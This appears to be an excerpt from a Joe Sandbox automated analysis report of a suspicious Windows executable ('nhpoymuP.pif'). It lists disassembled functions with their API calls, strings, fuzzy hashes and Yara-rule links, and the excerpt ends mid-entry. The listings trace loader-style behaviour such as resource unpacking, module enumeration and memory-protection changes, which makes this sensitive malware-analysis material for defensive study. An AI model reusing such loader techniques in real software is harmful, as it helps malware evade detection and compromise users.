Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39eea0c2f4e7b032d85fcb381142c85f33375e3fbc007af8b508d0dfe80af595
Instruction ID: 6f90a28032eb2a21b9c31f55d5b5c9733e07f15bbd58f371357568afe2816c0b
Opcode Fuzzy Hash: 39eea0c2f4e7b032d85fcb381142c85f33375e3fbc007af8b508d0dfe80af595
Instruction Fuzzy Hash: 59A118777106064BEF19AA7C9C8E3ADB3C69BC4225F1C427ED11DCB381DBE5CA419650

Function 02C9946C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 79threadCOMMON

Download Yara Rule

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02C9955A), ref: 02C994F2
GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02C9955A), ref: 02C994F8

Strings

yyyy, xrefs: 02C994CD

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: yyyy
API String ID: 3303714858-3145165042
Opcode ID: 57475cecad93b4502313d5902d6b9a86011befbed4590ea30a15c2accaa3dd1d
Instruction ID: ac099d3b6b6547ee7b5608ca2dd8a3d4bfca2ef65ce26164d463ed82982edbbf
Opcode Fuzzy Hash: 57475cecad93b4502313d5902d6b9a86011befbed4590ea30a15c2accaa3dd1d
Instruction Fuzzy Hash: 2F216B71A002189FDF25DFA8C899AAEB3B9EF49710F5100A9E945E7240D730DF40EBA5

Function 02CA8184 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON

Download Yara Rule

APIs

Part of subcall function 02CA8018: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02CA8088,?,?,00000000,?,02CA79FE,ntdll,00000000,00000000,02CA7A43,?,?,00000000), ref: 02CA8056
Part of subcall function 02CA8018: GetModuleHandleA.KERNELBASE(?), ref: 02CA806A

Part of subcall function 02CA80C0: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02CA8148,?,?,00000000,00000000,?,02CA8061,00000000,KernelBASE,00000000,00000000,02CA8088), ref: 02CA810D
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02CA8113
Part of subcall function 02CA80C0: GetProcAddress.KERNEL32(?,?), ref: 02CA8125

FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02CA820E), ref: 02CA81F0

Strings

Kernel32, xrefs: 02CA81CF
FlushInstructionCache, xrefs: 02CA819D

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: HandleModule$AddressProc$CacheFlushInstruction
String ID: FlushInstructionCache$Kernel32
API String ID: 3811539418-184458249
Opcode ID: 8981f83d79f9683514c06f9a6810d1085542f1ce53968987284997d276ee4e39
Instruction ID: ced31a4b1b379506ab57b8a4f4cc67a3acd90cb1165a836b34922e6baeb3050b
Opcode Fuzzy Hash: 8981f83d79f9683514c06f9a6810d1085542f1ce53968987284997d276ee4e39
Instruction Fuzzy Hash: 1E01D174A40304FFEB50EFE5DC62F6A77ADEB08B00F514660F608D3600D670AD109B20

Function 02CAAD5C Relevance: 5.1, APIs: 4, Instructions: 72COMMON

Download Yara Rule

APIs

IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAAD90
IsBadWritePtr.KERNEL32(?,00000004), ref: 02CAADC0
IsBadReadPtr.KERNEL32(?,00000008), ref: 02CAADDF
IsBadReadPtr.KERNEL32(?,00000004), ref: 02CAADEB

Memory Dump Source

Source File: 00000000.00000002.1716190958.0000000002C91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000000.00000002.1716160381.0000000002C90000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716334083.0000000002CBD000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716492680.0000000002CF1000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE5000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.1716539597.0000000002DE8000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c90000_image.jbxd

Similarity

API ID: Read$Write
String ID:
API String ID: 3448952669-0
Opcode ID: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction ID: f49c6c53472240e498bc6a49742ba99d0953ed72c0f479bccd4d4414bba70bfe
Opcode Fuzzy Hash: a93baf0632f810e868fc304dc02f88cb2819ea7b8e0cd4cec62af5963c9676e9
Instruction Fuzzy Hash: 0D21A2B1A4131A9BDF10DF29CC80BAEB3B9EF80759F108111EE9097380DB34DD11DAA0

Analysis Process: nhpoymuP.pifPID: 7416, Parent PID: 7276COMMON

Execution Graph

Execution Coverage:	6.9%
Dynamic/Decrypted Code Coverage:	13.2%
Signature Coverage:	13%
Total number of Nodes:	370
Total number of Limit Nodes:	39

Executed Functions

Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747
comprocessCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OleInitialize.OLE32(00000000), ref: 004019FD
_getenv.LIBCMT ref: 00401ABA
GetCurrentProcessId.KERNEL32 ref: 00401ACD
CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
Module32First.KERNEL32 ref: 00401C48
CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
Module32Next.KERNEL32(00000000,?), ref: 00401D02
Module32Next.KERNEL32(00000000,?), ref: 00401DB6
CloseHandle.KERNEL32(00000000), ref: 00401DC4
GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
LockResource.KERNEL32(00000000), ref: 00401EA7
SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
_malloc.LIBCMT ref: 00401EBA
_memset.LIBCMT ref: 00401EDD
SizeofResource.KERNEL32(00000000,?), ref: 00401F02

Strings

o, xrefs: 00401B8D
[, xrefs: 00401B37
!, xrefs: 0040201A
E, xrefs: 00401E0F
___, xrefs: 0040227D
h, xrefs: 00401A6F
U, xrefs: 004020F5
*, xrefs: 00401A1F
v, xrefs: 00401B5A
!, xrefs: 004020CF
x, xrefs: 0040214A
x, xrefs: 00402088
., xrefs: 00401B0A
{, xrefs: 0040205B
{, xrefs: 00401B4B
:, xrefs: 00401B28
V, xrefs: 00401E19
{, xrefs: 00401E3C
W, xrefs: 004020E6
', xrefs: 00402006
_._, xrefs: 00402257
*, xrefs: 004020E1
%, xrefs: 004020FA
', xrefs: 00401AF6
4, xrefs: 00401B64
4, xrefs: 00402074
x, xrefs: 00401B78
[, xrefs: 00402047
5, xrefs: 00402109
D, xrefs: 00401DFB
., xrefs: 0040201F
v, xrefs: 00401E4B
8, xrefs: 00401BA9
4, xrefs: 00402136
o, xrefs: 00402159
o, xrefs: 00402097
!, xrefs: 00401B1E
{, xrefs: 0040211D
W, xrefs: 00401B14
), xrefs: 0040202E
6, xrefs: 004020C5
0, xrefs: 00401BBD
v, xrefs: 0040206A
x, xrefs: 00401E69
", xrefs: 00401B0F
W, xrefs: 00401B23
W, xrefs: 00402033
V, xrefs: 00402038
v, xrefs: 0040212C

Memory Dump Source

Source File: 00000003.00000002.1965140113.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.1965140113.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.1965140113.000000000043F000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
API String ID: 1430744539-2962942730
Opcode ID: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
Opcode Fuzzy Hash: d0a656ef22f929bc6f1ae9c8f6a3c9921df1d352ff09963eac3f83f05ace134f
Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B

Function 3250BEC8 Relevance: 1.6, APIs: 1, Instructions: 91threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,?,?), ref: 3250BF70

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: 975c1ea1e6adfec30bca1047760cc631962233c8cc8503f0c41b67f4fd7f8608
Instruction ID: 9c4d438f13f816e879bb8bc152cdfa175ab177fddee26df0e2c9c18555bceafa
Opcode Fuzzy Hash: 975c1ea1e6adfec30bca1047760cc631962233c8cc8503f0c41b67f4fd7f8608
Instruction Fuzzy Hash: 4C31CAB9D012189FCB10CFA9E984AEEFBF1AB49314F20946AE408B7210C774AA45CF54

Function 3250BED0 Relevance: 1.6, APIs: 1, Instructions: 87threadCOMMON

Download Yara Rule

APIs

EnumThreadWindows.USER32(?,?,?), ref: 3250BF70

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: EnumThreadWindows
String ID:
API String ID: 2941952884-0
Opcode ID: a9b7d78604b07b35dae7965e7afe54edcf734c81e8f0a7d0a4d2239f292c49a5
Instruction ID: efc3dff309685d1b52f6c339df82de226c7b22f95acc51bb765239b6bdaf447d
Opcode Fuzzy Hash: a9b7d78604b07b35dae7965e7afe54edcf734c81e8f0a7d0a4d2239f292c49a5
Instruction Fuzzy Hash: 8831BAB9D05218DFCB10CFA9D984AEEFBF1AB49314F20902AE408B7310C774AA45CF94

Function 0040CBF7 Relevance: 21.1, APIs: 14, Instructions: 78COMMON

Download Yara Rule

APIs

_fast_error_exit.LIBCMT ref: 0040CC41
__mtinit.LIBCMT ref: 0040CC47
_fast_error_exit.LIBCMT ref: 0040CC52
__RTC_Initialize.LIBCMT ref: 0040CC58
__ioinit.LIBCMT ref: 0040CC61
__amsg_exit.LIBCMT ref: 0040CC6C
GetCommandLineA.KERNEL32 ref: 0040CC72
___crtGetEnvironmentStringsA.LIBCMT ref: 0040CC7D
__setargv.LIBCMT ref: 0040CC87
__amsg_exit.LIBCMT ref: 0040CC92
__setenvp.LIBCMT ref: 0040CC98
__amsg_exit.LIBCMT ref: 0040CCA3
__cinit.LIBCMT ref: 0040CCAB
__amsg_exit.LIBCMT ref: 0040CCB6

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: __amsg_exit$_fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__mtinit__setargv__setenvp
String ID:
API String ID: 2598563909-0
Opcode ID: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction ID: 67c2b95978a5c3de314e94e7eee78366e8702871eb07600154e5c77a41a3d030
Opcode Fuzzy Hash: 2d668fad8e0b173589b4563f5a4f7b2cb6976b6486fb72b9956ee4840b6c9fb0
Instruction Fuzzy Hash: 5321E770A05304DAFB207BB3E98676932B46F00309F00453FE508B62D2EB7C89918A5C

Function 325087D8 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 332
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetActiveWindow.USER32 ref: 32508967

Strings

xk92, xrefs: 32508AF8
Hbq, xrefs: 32508B83
Hbq, xrefs: 32508BC8
xk92, xrefs: 32508860
,l92, xrefs: 3250888B

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: ActiveWindow
String ID: ,l92$Hbq$Hbq$xk92$xk92
API String ID: 2558294473-3253162116
Opcode ID: 490fb3234ae538f9eaf6928aed14762da6593702bac4aacf7cde07b432b89e67
Instruction ID: d40f728d28f149f5f1ffa1ba7aef74cc8712ec05eca27d043f1c0cba3616ed54
Opcode Fuzzy Hash: 490fb3234ae538f9eaf6928aed14762da6593702bac4aacf7cde07b432b89e67
Instruction Fuzzy Hash: 1CC1A174F042459FDB04AF79D9587AE7BE6AF89340F248828D806EB390DE349D42CB65

Function 004018F0 Relevance: 6.3, APIs: 5, Instructions: 77stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?), ref: 00401906
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000001), ref: 0040192F
GetLastError.KERNEL32 ref: 00401940
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401958
MultiByteToWideChar.KERNEL32(?,00000000,?,00000001,00000000,00000000), ref: 00401980

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$ErrorLastlstrlen
String ID:
API String ID: 3322701435-0
Opcode ID: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction ID: 001f8acd6346668203df0e37acbb0982e2c141f20d3592a2a78c171e7710dcce
Opcode Fuzzy Hash: dc08e0b6a0031b3e1018e6655837127b4a51d66f486618f8dc54bc0ca8c4194d
Instruction Fuzzy Hash: 4011C4756003247BD3309B15CC88F677F6CEB86BA9F008169FD85AB291C635AC04C6F8

Function 32509A80 Relevance: 6.1, APIs: 4, Instructions: 146
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 32509B26
GetCurrentThread.KERNEL32 ref: 32509B63
GetCurrentProcess.KERNEL32 ref: 32509BA0
GetCurrentThreadId.KERNEL32 ref: 32509BF9

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d9422974b702daa87f971ffb808c9fcdea793590aad871d219ebce66661d0097
Instruction ID: ec258e5636026accb5675553612588ff617d96218775f620ddd716367617e912
Opcode Fuzzy Hash: d9422974b702daa87f971ffb808c9fcdea793590aad871d219ebce66661d0097
Instruction Fuzzy Hash: 355146B0901349CFDB00DFA9CA44BEEBFF1AF89314F208499D459A7261C7349985CF65

Function 32509AA8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 32509B26
GetCurrentThread.KERNEL32 ref: 32509B63
GetCurrentProcess.KERNEL32 ref: 32509BA0
GetCurrentThreadId.KERNEL32 ref: 32509BF9

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 0db81b83619d4da3da2423f39490f89eeac9a53f7cc1af9e22cff03fd171d7de
Instruction ID: ddcb164c0a97f970b62f5c7894aea77642a398f67dfa31e75d76f88d067fe398
Opcode Fuzzy Hash: 0db81b83619d4da3da2423f39490f89eeac9a53f7cc1af9e22cff03fd171d7de
Instruction Fuzzy Hash: 865125B0900309CFDB04DFAACA48BEEBBF1AF88314F20C059D459A7264DB75A941CF65

Function 0040AF66 Relevance: 6.0, APIs: 4, Instructions: 34COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0040AF80

Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4

std::bad_alloc::bad_alloc.LIBCMT ref: 0040AFA3

Part of subcall function 0040AEFC: std::exception::exception.LIBCMT ref: 0040AF08

std::bad_exception::bad_exception.LIBCMT ref: 0040AFB7
__CxxThrowException@8.LIBCMT ref: 0040AFC5

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: AllocateException@8HeapThrow_mallocstd::bad_alloc::bad_allocstd::bad_exception::bad_exceptionstd::exception::exception
String ID:
API String ID: 1411284514-0
Opcode ID: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction ID: 8b9ae61c6da4be1dff3a05d3864a1109474d1d20ea1a05e38be312cad591667e
Opcode Fuzzy Hash: 248d97f5b0d58b32bb2c6dfd0cee56c1e8c558e55d5e2921fa5105a46d33be9f
Instruction Fuzzy Hash: 67F0BE21A0030662CA15BB61EC06D8E3B688F4031CB6000BFE811761D2CFBCEA55859E

Function 3250BDD0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 68
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 3250BE62

Strings

O, xrefs: 3250BDD8

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: CurrentThread
String ID: O
API String ID: 2882836952-878818188
Opcode ID: 90b08dca5476b36458cd35e7941dd3c3835cd467e612d483f7832367fa7223a7
Instruction ID: 1873b0c3ce4c6a13665f226f6d7407ecf9ebc80a11bdc99e9eb0efcb7cd610c6
Opcode Fuzzy Hash: 90b08dca5476b36458cd35e7941dd3c3835cd467e612d483f7832367fa7223a7
Instruction Fuzzy Hash: 053124B49002498FCB00DFA9C980A9EFBF0EF49314F14859AD458AB366C774A945CFA5

Function 0040E7EE Relevance: 3.0, APIs: 2, Instructions: 8COMMON

Download Yara Rule

APIs

___crtCorExitProcess.LIBCMT ref: 0040E7F6

Part of subcall function 0040E7C3: GetModuleHandleW.KERNEL32(mscoree.dll,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7CD
Part of subcall function 0040E7C3: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0040E7DD
Part of subcall function 0040E7C3: CorExitProcess.MSCOREE(00000001,?,0040E7FB,00000001,?,0040B886,000000FF,0000001E,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018), ref: 0040E7EA

ExitProcess.KERNEL32 ref: 0040E7FF

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: ExitProcess$AddressHandleModuleProc___crt
String ID:
API String ID: 2427264223-0
Opcode ID: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction ID: d9ec683f250bcd397ae0bae66fbc2b9097e114182cfe22e5ca4178904d999afd
Opcode Fuzzy Hash: 65da83064d662722dc3cf0b1a9484b1fe75efcd2066e1800ec5593f74242e35d
Instruction Fuzzy Hash: ADB09B31000108BFDB112F13DC09C493F59DB40750711C435F41805071DF719D5195D5

Function 3250A0F0 Relevance: 1.6, APIs: 1, Instructions: 110COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3250A1C3

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: e08f51146b6f0dbafb5b2828a2f9a51ba92e10ca6b6847b9aae3c9da5edefca4
Instruction ID: a5afd7dcf6707137fe613139140a3b127bc94bf8212794ab6010fabe5fb030a4
Opcode Fuzzy Hash: e08f51146b6f0dbafb5b2828a2f9a51ba92e10ca6b6847b9aae3c9da5edefca4
Instruction Fuzzy Hash: 7B4177B9D002599FCF00CFA9D984ADEBBF1BB09310F14946AE918BB314D335AA45CF54

Function 3250A0F8 Relevance: 1.6, APIs: 1, Instructions: 108COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 3250A1C3

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7f036d63d52954493aa10429f017885dae0963177d7511fae592cf7299eb8ab0
Instruction ID: d01871c0a03b52660a149c47e8f4b2af8d8347d8758d0cd6b40380106d933290
Opcode Fuzzy Hash: 7f036d63d52954493aa10429f017885dae0963177d7511fae592cf7299eb8ab0
Instruction Fuzzy Hash: EC4157B9D002589FCF00CFA9D984ADEBBF5BB09310F14946AE918BB311D735AA45CF54

Function 3250871C Relevance: 1.6, APIs: 1, Instructions: 107windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,?,?,?), ref: 3250C3A9

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 37c800f140021699197c11735e214612a08513c0acfcf9d7cfd838fe4628d7f5
Instruction ID: df761206b7532573c2b92bf2b7a5d13c30e6e6529c47c3142e271821478ae0d4
Opcode Fuzzy Hash: 37c800f140021699197c11735e214612a08513c0acfcf9d7cfd838fe4628d7f5
Instruction Fuzzy Hash: 234188B8D04258DFCB00CFA9D984ADEFBF1BB49314F14906AE858BB220D775AA45CF54

Function 3250C2D0 Relevance: 1.6, APIs: 1, Instructions: 106windowCOMMON

Download Yara Rule

APIs

MessageBoxW.USER32(?,?,?,?), ref: 3250C3A9

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: Message
String ID:
API String ID: 2030045667-0
Opcode ID: 1a1fd57bc24031fa0ceadb9ef13f41f7b86cba60f3f541256d5ecc9634727aa3
Instruction ID: cd1425e33b54b6707d10e6951f9644a61590065f0f0ca81c85b72dd0db2c3e40
Opcode Fuzzy Hash: 1a1fd57bc24031fa0ceadb9ef13f41f7b86cba60f3f541256d5ecc9634727aa3
Instruction Fuzzy Hash: D0419AB8D00258DFCB00CFA9D984ADDFBF1BB49314F14906AE858BB220D775AA45CF54

Function 2F55EE60 Relevance: 1.6, APIs: 1, Instructions: 96memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNEL32(?,?,?,?), ref: 2F55EF04

Memory Dump Source

Source File: 00000003.00000002.1984979216.000000002F550000.00000040.00000800.00020000.00000000.sdmp, Offset: 2F550000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2f550000_nhpoymuP.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: df1a425f946c7caf0688f257590d3470bb07eaab3dd0c45be641ab788074fa47
Instruction ID: c0ae5e7525cc4de8f9624d12d56bc5075d737baae143c2361f44179f3c6a41ae
Opcode Fuzzy Hash: df1a425f946c7caf0688f257590d3470bb07eaab3dd0c45be641ab788074fa47
Instruction Fuzzy Hash: 013186B9D052589FCB14CFA9D980ADEFBB1AF49310F20942AE818B7210D735A9458F98

Function 32508D0F Relevance: 1.6, APIs: 1, Instructions: 90COMMON

Download Yara Rule

APIs

GetProcessWindowStation.USER32 ref: 32508D7D

Memory Dump Source

Source File: 00000003.00000002.1989485777.0000000032500000.00000040.00000800.00020000.00000000.sdmp, Offset: 32500000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_32500000_nhpoymuP.jbxd

Similarity

API ID: ProcessStationWindow
String ID:
API String ID: 3348185895-0
Opcode ID: 1aa5c7a52730ba2f08b11ef40ab2a2fa863d73808fd46f9f14e1f6bcbf45cf32
Instruction ID: a58b4d3cc913e0767eb9f0bb0b631198feba1f1dfb0aa727a280b906be89a39c
Opcode Fuzzy Hash: 1aa5c7a52730ba2f08b11ef40ab2a2fa863d73808fd46f9f14e1f6bcbf45cf32
Instruction Fuzzy Hash: 1731E2B1A04348CFDB01DFA5D9447AEBFE4EF8A314F148469C049A7281C7759A86CFA1

Function 00401870 Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0040AF66: _malloc.LIBCMT ref: 0040AF80

SysAllocString.OLEAUT32 ref: 00401898

Memory Dump Source

Source File: 00000003.00000001.1710492566.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000001.1710492566.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_1_400000_nhpoymuP.jbxd

Yara matches

Similarity

API ID: AllocString_malloc
String ID:
API String ID: 959018026-0
Opcode ID: 2b2277ba2f7599175ad158743716730806d9da3e8ba5769d67c84622d6ab0768
